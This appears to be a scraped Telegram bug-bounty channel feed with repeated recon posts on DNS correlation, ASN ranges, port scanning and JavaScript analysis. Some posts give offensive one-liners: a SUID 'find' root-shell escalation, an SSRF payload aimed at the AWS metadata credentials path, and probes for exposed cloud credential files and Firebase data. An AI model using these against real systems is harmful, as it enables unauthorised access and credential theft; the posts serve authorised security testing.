Bug Bounty Diary

-----‐------------------------------- ✎ Discovering Domains via NS Correlation -----‐------------------------------- ● What is a Nameserver? A nameserver (NS) is a specialised server within the Domain Name System (DNS) which translates human-readable domain names into IP addresses. Essentially, nameservers tell the internet where to find your web server. In this post I will describe a simple technique which can be used to correlate one or more websites using NS data. ● Finding Nameservers To find the nameservers for a domain name, the simplest way is to use the dig tool:

$ dig +noall +answer ns deliveroo.com
deliveroo.com.          86400   IN      NS      mona.ns.cloudflare.com.
deliveroo.com.          86400   IN      NS      phil.ns.cloudflare.com.

● Finding Related Domains Some DNS providers like Cloudflare will assign you a NS pair at the account level. This means that all domain names you add to your account will share the same NS pair. In the example above, deliveroo.com uses the Cloudflare nameserver pair mona.ns.cloudflare.com and phil.ns.cloudflare.com. Domains added under the same Cloudflare account are often assigned the same NS pair. Since the number of possible Cloudflare NS pair combinations is limited, many domains share them, making it relatively easy to identify other domains that may be managed by the same operator. ● Downloading The Dataset Merklemap provides a DNS record database containing 4 billion+ records. You can download it here. The dataset is provided in JSONL format and is compressed using xz. The uncompressed raw data is around ~500GB in size. If you just want to extract domain/NS pairs in the format domain,ns1,ns2,ns... you can use xzcat with jq like so:

xzcat dns_records_database.jsonl.xz | jq -r '
  select([.results[] | .success?.records?.NS? // empty] | length > 0) |
  [.hostname] + [.results[].success?.records?.NS? // empty | .[]] |
  join(",")
' > domains.csv

● Querying the Dataset One way to query the parsed data is using DuckDB. grep will also work but will probably be a bit slower.

NS1="phil.ns.cloudflare.com."
NS2="mona.ns.cloudflare.com."
duckdb -csv -noheader -c "
  SELECT column0 AS domain, column1 AS ns
  FROM read_csv('domains.csv', header=false)
  WHERE list_sort(str_split(column1, ',')) = list_sort(['${NS1}','${NS2}'])
" > results.csv

Looking at results.csv we have ~300 entries. A lot are false positives, but there are some new domains which definitely belong to the same operator:

$ grep -i deliveroo results.csv | cut -d, -f1
deliveroo.de
deliveroo.blog
deliveroo.xn--9dbq2a
... 32 more

In a lot of cases you might not be able to correlate one website to another based on just a keyword in the domain name. In those cases you can do things like: • Fingerprint HTTP responses • Compare WHOIS information • Compare technologies used • DNS similarities #bugbounty #recon #DNS © T.me/BugBounty_Diary

-----‐------------------------------- ✎ Discovering Domains via NS Correlation -----‐------------------------------- ● What is a Nameserver? A nameserver (NS) is a specialised server within the Domain Name System (DNS) which translates human-readable domain names into IP addresses. Essentially, nameservers tell the internet where to find your web server. In this post I will describe a simple technique which can be used to correlate one or more websites using NS data. ● Finding Nameservers To find the nameservers for a domain name, the simplest way is to use the dig tool:

$ dig +noall +answer ns deliveroo.com
deliveroo.com.          86400   IN      NS      mona.ns.cloudflare.com.
deliveroo.com.          86400   IN      NS      phil.ns.cloudflare.com.

● Finding Related Domains Some DNS providers like Cloudflare will assign you a NS pair at the account level. This means that all domain names you add to your account will share the same NS pair. In the example above, deliveroo.com uses the Cloudflare nameserver pair mona.ns.cloudflare.com and phil.ns.cloudflare.com. Domains added under the same Cloudflare account are often assigned the same NS pair. Since the number of possible Cloudflare NS pair combinations is limited, many domains share them, making it relatively easy to identify other domains that may be managed by the same operator. ● Downloading The Dataset Merklemap provides a DNS record database containing 4 billion+ records. You can download it here. The dataset is provided in JSONL format and is compressed using xz. The uncompressed raw data is around ~500GB in size. If you just want to extract domain/NS pairs in the format domain,ns1,ns2,ns... you can use xzcat with jq like so:

xzcat dns_records_database.jsonl.xz | jq -r '
  select([.results[] | .success?.records?.NS? // empty] | length > 0) |
  [.hostname] + [.results[].success?.records?.NS? // empty | .[]] |
  join(",")
' > domains.csv

● Querying the Dataset One way to query the parsed data is using DuckDB. grep will also work but will probably be a bit slower.

NS1="phil.ns.cloudflare.com."
NS2="mona.ns.cloudflare.com."
duckdb -csv -noheader -c "
  SELECT column0 AS domain, column1 AS ns
  FROM read_csv('domains.csv', header=false)
  WHERE list_sort(str_split(column1, ',')) = list_sort(['${NS1}','${NS2}'])
" > results.csv

Looking at results.csv we have ~300 entries. A lot are false positives, but there are some new domains which definitely belong to the same operator:

$ grep -i deliveroo results.csv | cut -d, -f1
deliveroo.de
deliveroo.blog
deliveroo.xn--9dbq2a
... 32 more

In a lot of cases you might not be able to correlate one website to another based on just a keyword in the domain name. In those cases you can do things like: • Fingerprint HTTP responses • Compare WHOIS information • Compare technologies used • DNS similarities #bugbounty #recon #DNS © T.me/BugBounty_Diary

-----‐------------------------------- ✎ Linux Security → SUID & Privilege Boundaries -----‐------------------------------- In Linux, security heavily depends on permission architecture. One critical mechanism is SUID (Set User ID). ● What is SUID? When SUID is applied to an executable, it runs with the file owner’s permissions instead of the executing user’s. If the file is owned by root, it grants elevated privileges.

[me@linux ~]$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root ...

• The s indicates SUID. This allows normal users to run passwd, which needs root access to update /etc/shadow. SUID itself is legitimate, misconfigured SUID binaries are dangerous. If powerful binaries like: • bash • vim • find are improperly assigned SUID, they may be abused for privilege escalation. ● Enumerating SUID Binaries

find / -perm -4000 -type f 2>/dev/null

This way we can find the files with SUID. ● A Usage example: Let's say find has SUID

find . -exec /bin/sh -p \; -quit

With this you can open a shell as the root. ● To Audit You need find the files with SUID the way I said before and delete the tag :

chmod u-s /path/to/binary

#bugbounty #Linux © T.me/BugBounty_Diary

✎ CompTIA Network+ Summary - Module 3 Module 3 is now live on my Hashnode series.

--Interfaces & Switches--

As always stripped down to the essentials with no fluff. • Blog: Network+ Summary - Module 3

✎ ASN → IP Recon Workflow (BGPView alternative) I used to rely on bgpview.io for extracting IP ranges from ASNs it was free and useful for recon workflows. But after it went down, I looked for an alternative and found this awesome repo: • as-ip-blocks: Github It lets you pull IPv4/IPv6 prefixes per ASN directly from raw GitHub data, which is ideal for automation. </> Bash Function for ASN → IP Enumeration You can plug this directly into your recon pipeline or customize it for your tools

asn2ip() {
  local base="https://raw.githubusercontent.com/ipverse/as-ip-blocks/master/as"

  fetch_asn() {
    curl -fsSL "$base/$1/aggregated.json" \
      | jq -r '.prefixes.ipv4[]?' 2>/dev/null \
      | sort -u
  }

  if [ ! -t 0 ]; then
    while IFS= read -r asn; do
      fetch_asn "$asn"
    done
  else
    fetch_asn "$1"
  fi
}

• Single ASN → IP Ranges

asn2ip 1234

• List of ASNs → IP Ranges

cat asnList | asn2ip

#bugbounty #recon #automation © T.me/BugBounty_Diary

✎ ASN → IP Recon Workflow (BGPView alternative) I used to rely on bgpview.io for extracting IP ranges from ASNs it was free and useful for recon workflows. But after it went down, I looked for an alternative and found this awesome repo: • as-ip-blocks: Github It lets you pull IPv4/IPv6 prefixes per ASN directly from raw GitHub data, which is ideal for automation. </> Bash Function for ASN → IP Enumeration You can plug this directly into your recon pipeline or customize it for your tools

asn2ip() {
  local base="https://raw.githubusercontent.com/ipverse/as-ip-blocks/master/as"

  fetch_asn() {
    curl -fsSL "$base/$1/aggregated.json" \
      | jq -r '.prefixes.ipv4[]?' 2>/dev/null \
      | sort -u
  }

  if [ ! -t 0 ]; then
    while IFS= read -r asn; do
      fetch_asn "$asn"
    done
  else
    fetch_asn "$1"
  fi
}

• Single ASN → IP Ranges

asn2ip 1234

• List of ASNs → IP Ranges

cat asnList | asn2ip

#bugbounty #recon #automation © T.me/BugBounty_Diary

✎ CompTIA Network+ Summary - Module 2 Module 2 is now live on my Hashnode series. Stripped down to the essentials, focusing only on what actually matters for understanding networks from a cybersecurity perspective. • Blog: Network+ Summary - Module 2 #bugbounty #network © T.me/BugBounty_Diary

✎ IP Spoofing to Account Takeover: You Patched It? Really? In my previous article, I described how I found a security flaw in a popular desktop app's OAuth flow that allowed me to steal any user's account with just one click. I reported it, saw it patched, and then bypassed the patch again. Since the process of bypassing and exploiting the flaw is interesting to me, I decided to write a second article about it. • Blog: IP Spoofing to Account Takeover #bugbounty #ipspoofing #oauth © T.me/BugBounty_Diary

If you have any questions regarding this writeup, feel free to ask me at @Spix0r

✎ IP Spoofing to Account Takeover: You Patched It? Really? In my previous article, I described how I found a security flaw in a popular desktop app's OAuth flow that allowed me to steal any user's account with just one click. I reported it, saw it patched, and then bypassed the patch again. Since the process of bypassing and exploiting the flaw is interesting to me, I decided to write a second article about it. • Blog: IP Spoofing to Account Takeover #bugbounty #ipspoofing #oauth © T.me/BugBounty_Diary

✎ Tuning Time, Depth, and Accuracy in Port Scanning Different port scanners excel in different aspects • Nmap → depth • MassScan → scalability • Naabu → simplicity • RustScan → speed Nabuu + Nmap 1. Service version detection

naabu -host http://example.com -p 80,443,8080 -nmap-cli 'nmap -sV -sC'

2. Full vuln scan on discovered ports

naabu -l targets.txt -top-ports 1000 -nmap-cli 'nmap -sV --script vuln -oN nmap-vuln.txt'

3. Quick banner grab + OS detection

naabu -host 10.0.0.0/24 -p 22,80,443 -nmap-cli 'nmap -sV -O --script banner -oG results.gnmap'

• The flow: Naabu finds open ports fast → pipes them to nmap for deeper enumeration. Best of both worlds. #bugbounty #recon #portscan © T.me/BugBounty_Diary

✎ CompTIA Network+ Summary - Module 1 I’ve decided to summarize the CompTIA Network+ book through the lens of security. My goal is to keep only the parts that truly matter for cybersecurity, ethical hacking, and bug bounty and remove the noise. Module 1 is now ready, and I’m excited to share it with you. Hope you find it useful and insightful. • Blog: https://amir-fard.gitbook.io/amir-fard-docs/ #bugbounty #network © T.me/BugBounty_Diary

I can't hunt for bugs anymore with this connectivity (only one Cloudflare IP is open here, which is behind ChatGPT! currently, all the traffic from Iran goes through there :))) Can anyone share the latest bug bounty tips or tricks in the comments?👇

✎ Burp Extension for API Testing in JS-Rich Targets This tool helps identify endpoints, files, internal emails, and some secrets hidden in minified JavaScript, achieving maximum efficiency while minimizing noise in the results. • Repository: Github #bugbounty #recon #javascript #burp © T.me/BugBounty_Diary

Hey dear subscribers, This channel has been inactive for one week because Iran's government shut down the entire internet, preventing us from accessing free internet as usual. I was very worried about my open reports and this channel. Starting today, I am working hard and focusing on posting more content. Thank you all, 🕷 Spix0r

I'm alive, just not hunting for a while, and writing a new write-up.

✎ Cloud Security One Liners • AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

• S3 Permission Check

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

• Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

• Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

• GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

• AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

• Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

#bugbounty #recon #cloud © T.me/BugBounty_Diary

Just wanted to inform you that Writeup-Miner is now live on @Daily_Writeups. Join if you want the latest Bug Bounty and Cybersecurity write-ups.  Thank you all ♥️🙌

✎Grep tips for Javascript Analysis • Extracting JavaScript Files from recursive Directories

find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;

• Searching for API Keys and Secrets

cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"

• Detecting Dangerous Function Calls

cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"

• Checking for URL Manipulation

cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"

• Searching for Cross-Origin Requests

cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files

• Analyzing postMessage Usage

cat * | grep -r "postMessage"

• Finding Hardcoded URLs or Endpoints

cat * | grep -rE "https?://|www\."

• Locating Debugging Information

cat * | grep -rE "console\.log|debugger|alert|console\.dir"

• Investigating User Input Handling

cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"

#bugbounty #recon #javascript © T.me/BugBounty_Diary

✎ Deobfuscate obfuscator.io, unminify, transpile, and unpack webpack/browserify, using webcrack to resemble the original source code as much as possible. Command Line Interface

npm install -g webcrack

Examples

webcrack input.js
webcrack input.js > output.js
webcrack bundle.js -o output-dir

• Repository: Github • Website: webcrack.netlify.app #bugbounty #recon #javascript #deobfuscate © T.me/BugBounty_Diary